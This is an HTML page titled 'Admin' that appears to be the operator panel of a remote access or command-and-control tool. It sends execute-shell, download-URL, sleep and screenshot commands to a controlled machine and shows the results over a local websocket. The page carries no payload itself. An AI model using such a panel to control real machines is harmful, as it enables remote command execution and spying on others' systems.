<!doctype html>
<script src="socks.js"></script>
<script src="jquery.js"></script>

<html>
<head>
  <style>
  html {
	min-height: 100%;
  }
  body {
	color: lime;
	background-color: black;
	font-family: monospace;
  }
  #hostmenu {
	display: none;
	position: absolute;
	padding: 5px;
	background-color: black;
	border: 1px solid #0f0;
  }
  a {
	color: lime;
	text-decoration: none;
  }
  input {
	color: lime;
	font-family: monospace;
	background-color: #151;
	border: 1px solid lime;
  }
  button {
	color: lime;
	font-family: monospace;
	background-color: #151;
	border: 1px solid lime;
  }
  select {
  color: lime;
  font-family: monospace;
  background-color: #151;
  border: 1px solid lime;
  margin-right:7px;
  }
  .frmHeading {
	background-color: #151;
	color: lime;
	font-weight: bold;
  }
  .frm {
	display: none;
	position: absolute;
	padding: 5px;
	background-color: black;
	border: 1px solid #0f0;
  }
  hr {
	height: 1px;
	border: 1px solid #151;
  }
  td {
	padding: 0 15px 0 0;
  }
  #wrapper {
    width: 1102px;
    border: 1px solid black;
    overflow: hidden; /* add this to contain floated children */
	}
  #main {
    width: 800px;
    float:left; /* add this */
    border: 1px solid black;
	}
  #commands {
    width: 230px;
    border: 1px solid black;
    float: left; /* add this */
	}
  </style>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Admin</title>
</head>
<body>
<div id="wrapper">
 <div id="commands">
  <b>Commands:</b>
  <li>execute [shell command]
  <li>download [url]
  <li>sleep [seconds]
  <li>screenshot [filename].png
 </div>
 <div id="main">
  <form name="cmdUpdate" method="get" action="/cmdUpdate">
    <select name="cmd">
      <option value="execute">execute</option>
      <option value="download">download</option>
      <option value="sleep">sleep</option>
      <option value="screenshot">screenshot</option>
    <input type="text" name="vars" value=""></input>
    <input type="submit" name="submit" value="submit"></input>
  </form>
  <div class="output" style="white-space: pre"></div>
 </div>
</div>

<script>var sock = new SockJS('https://127.0.0.1/websocket');
 sock.onopen = function() {
     console.log('open');
     //sock.send('test');
 };
 sock.onmessage = function(e) {
     console.log('message', e.data);
     $('.output').text(e.data)
 };
 sock.onclose = function() {
     console.log('close');
 };
 </script>

</body>
</html>
